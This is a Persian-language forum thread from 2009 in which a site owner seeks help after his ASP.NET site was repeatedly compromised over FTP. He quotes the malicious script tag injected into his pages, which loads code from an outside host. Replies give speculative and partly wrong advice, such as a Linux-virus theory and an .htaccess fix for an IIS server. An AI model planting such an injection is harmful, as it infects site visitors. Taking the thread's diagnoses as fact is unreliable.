پيدا كردن IP يك هكر

**peyman13618** · 2009-11-25, 05:39 PM

وب سايت ما در يك ماه گذشته دوبار از طريق ftp با يك IP 67.220.225.50 هك شده به اين صورت كه به تمام صفحات aspx كه از مسترپيج استفاده مي كنند و همه ي فايل هاي اسكريپت يه خط اسكريپت بصورت زير اضافه مي شه:
<script src=http://taemkft.extra.hu/sitebuilder/24.php >
IP بالا رو تو سايت iptools.com كه زدم (سايت جالبي هست براي رديابي IP) اطلاعات زير رو داد

Scratch Telecom NETBLK-SCRAT2 (NET-67-220-224-0-1)
67.220.224.0 - 67.220.255.255
HostPapa HOSTPST-BLOCK2 (NET-67-220-225-0-1)
67.220.225.0 - 67.220.225.255

# ARIN WHOIS database, last updated 2009-11-24 20:00
# Enter ? for additional hints on searching ARIN's WHOIS database.
كشور: Guatemala
چجوري ميشه فهميد اين IP مربوط به كدوم ISP هست؟ از داخل ايران بوده يا خارج از كشور؟ بصورت ويروس مشخصي هست يا ناشناخته بوده؟ و اينكه كلا اينجور خرابي ها رو چجوري ميشه بررسي كرد و به هكر اون رسيد؟

موضوعات مشابه:

**ghobar** · 2009-11-25, 05:55 PM

میشه گفت نمیشه من خودم از اینترنت یک طرفه استفاده میکنم از جرمنی اما خودم توی جای دیگه هستم ای اس پی ها هم که اینترنت ماهوارهای در اخطیار من و شما میزارن بدون جواز فعالیت میکنن و تازه اگر هم ای اس پی رو هم پیدا کنید به شما معلومات در مورد کستمرشون به شما نمیدن .
من بیشتر هکر ها رو دیدم فایل رو آماده میکنن و میرنن توی نت کیفی و فایل رو اجرا میکنن . این رو گفتم شاید این آی پی مربوط به یک نت کیفی باشه.

**hashem_wol** · 2009-11-25, 09:50 PM

ولش کن ارزش نداره

vpn و تونل و زده طرف بعد اومده سراغت!
میشه ردگیری کرد ولی به هزینه و وقت و نامه نگاریش نمیصرفه

شما اون پول .اسه رد گیری میخوای خرج کنی یک مشاور امنیتی بگیر مشکلاتت رو حل کنه!

با یکم مهندسی اجتماعی هم میتونی طرف رو پیدا کنی! بدون ip

**peyman13618** · 2009-11-28, 10:04 PM

يه بخش آپلود فايل تو سايت داشتيم كه اون رو هم غير فعال كردم ولي باز بعد از دو روز اون تگ اسكريپت به صفحات اضافه شد

<script src=http://taemkft.extra.hu/sitebuilder/24.php ></script>
كسي مي تونه راهنمايي كنه؟ هاست ادمين مي گفت از طريق ftp تون داره وارد مي شه اون طرف!!!! امكان داره سيستم كامپيوترم ويروسي باشه و مثلا يه keyloger به سيستم راه پيدا كرده باشه؟ آنتي ويروسم پاندا هستش و آپديت هست. به نظرتون با چي سيستم رو چك كنم؟

**shast** · 2009-11-28, 11:53 PM

دوست عزیز هک نشدین . این یک ویروس هست که جدیداً برای سیستم عامل لینوکس منتشر شده .
اینطور که من شنیدم شرکت هایی که پرتال میفروشن مثل vb این ویروس ماله اوناس که اگه سایتی license نخره این ویروس فعال میشه ... اما اینکه هک نشدین و این ویروس هستش شکی درش ندارم

**peyman13618** · 2009-11-29, 10:36 AM

اما سرور ما ويندوزي هستش و صفحات با دات نت برنامه نويسي شده. يعني خودم ايجادشون كردم. يعني سرور ويروسي شده؟ از طريق چه فايلي و چجوري؟ اگه ويروسي شده بود كه مسئول پشتيباني خبردار بود؟ چون وقتي براش توضيح دادم گفت بايد بررسي كنم و بعد گفت از طريق اين IP به FTP وصل شدن!!! چطوري بايد جلوي اينكار رو بگيرم. يعني ممكنه كسي باز پسورد جديد من رو داشته باشه؟

**shast** · 2009-11-29, 12:08 PM

باز هم میگم امکان نداره ویروس نباشه . شما یک .htaccess بسازین و تعریف کنید فایل ها غیر قابل تغیر باشن و بعد نتیجه رو ببینید

**peyman13618** · 2009-11-29, 03:08 PM

تا اونجايي كه من تو اين سايت چك كردم گويا htaccess. مربوط به آپاچي سرور ميشه ولي سرور ما IIS هستش. بازم اگه راهنمايي بفرمايين ممنون ميشم

**hashem_wol** · 2009-11-29, 06:03 PM

یک malewar نشون میده ظاهرا باید انالیز بشه!!

**shast** · 2009-11-29, 08:57 PM

با یک آنتی ویروس آپدیت شده یک چکی بکنید لطفاً

**hashem_wol** · 2009-11-30, 12:03 AM

اگر با ساختار میلور ها اشنا باشید وخصوصا این نوع که در اینجا بحثش هست انتی ویروس زیاد کاربردی نیست!!

از آنتی میلور نیتونید استفاده کنید ولی امید وار نباشید بهترین روش برای این موارد دستی هست.

**shast** · 2009-11-30, 12:26 AM

Base کار هاشون یکی هستش برای پیدا کردن ورم ها و ویروس ها و اسپای ور ها . برای مثال الان یک آنتی ویروس nod32 . ویروس Sality رو میشناسه . ورم jeefo هم میشناسه . یک PHP shell ای که encrypt نشده باشه هم میشناسه

**hashem_wol** · 2009-11-30, 01:05 AM

همون نود ۳۲ بالای ۱۰ تا میلور میتونم بدم لان بهش نشناسه!!!

بستگی به ساختار داره!

**shast** · 2009-11-30, 01:08 AM

منظور بنده رو متوجه نشدید . همون میلور رو میل بدید به نود . 1 هفته بعد نود رو آپدیت کنید ببینید میشناسه یا نه

**peyman13618** · 2009-12-02, 09:19 PM

رو كامپيوتر خودم چندتا ويروس بعد از اسكن با AVG 9 پيدا كردم ولي مطمئن نيستم كه كار اين ويروس ها باشه چون ipهايي كه از پشتيباني هاست به من گفتن به ftp وصل شده با IP من فرق مي كرد. البته ديگه از اون روز چيزي آپلود نكردم هنوز. تو گوگل هم اين تگ اسكريپت رو سرچ كردم چيزي پيدا نكردم

موضوع: پيدا كردن IP يك هكر

پیوند

ابزارهای موضوع

نمایش

پيدا كردن IP يك هكر

کلمات کلیدی در جستجوها:

پيدا كردن هكر

پیدا کردن محل ip

پيدا پسورد در آي پي

پیدا کردن آی پی یک سایت

یافتن هکر

پیدا کردن مکان IP

طریقه یافتن هکر

http://forum.persiannetworks.com/f25/t29862.html

پیدا کردن مکان یک آی پی

پیدا کردن ای پی یک سایت

پیدا کردن مکان از طریق ip

پیدا کردن ای پی هکر

اموزش پیدا کردن هکر

یافتن هکر ایمیل

سرچ كردن ip

پیدا کردن هکر ip

رديابي ip

ردیابی یک ip

پيدا كردن مكان از طريق ip

پیدا کردن از طریق ip

پیداکردن هکر

پیدا کردن هکر

چک کردن ای پی

پیدان کردن هکر

برچسب برای این موضوع

مجوز های ارسال و ویرایش